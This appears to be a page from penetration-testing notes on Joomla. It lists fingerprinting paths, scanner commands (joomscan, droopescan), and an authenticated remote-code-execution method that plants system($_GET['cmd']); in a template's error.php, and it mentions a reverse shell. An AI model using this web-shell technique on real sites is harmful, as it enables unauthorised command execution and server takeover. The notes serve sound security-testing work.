Joomla

Standard pages and folders

License files

/readme.txt
/administrator/manifests/files/joomla.xml _
/language/en-GB/en-GB.xml
/plugins/system/cache/cache.xml

/administrator

Resource folder

plugins/
plugins/system
templates/

Automatic scan tools

joomscan

A tool written in Perl capable of performing several checks on Joomla configuration and detect vulnerable components. Can be downloaded from here

perl joomscan.pl --update        #update vulnerable dependencies database
perl joomscan.pl --url <url>     #perform base checks
perl joomscan.pl -u <url> --ec   #enumerate components

droopescan

Limited support for joomla. Can detect version and interesting urls. Can be downloaded from here

droopescan scan joomla --url <url>

Authenticated RCE

After obtaining access to the administrative panel it is possible to execute commands on the underlying machine by editing a template page.

Select a template to edit
Append system($_GET['cmd']); in the error.php page and save
Navigate to <host>/templates/<template>/error.php?cmd=<cmd>

It is also possible to append the payload to launch a reverse shell and trigger it by visiting the modified page

PreviousDependency Injection NextWordpress

Last updated 2 years ago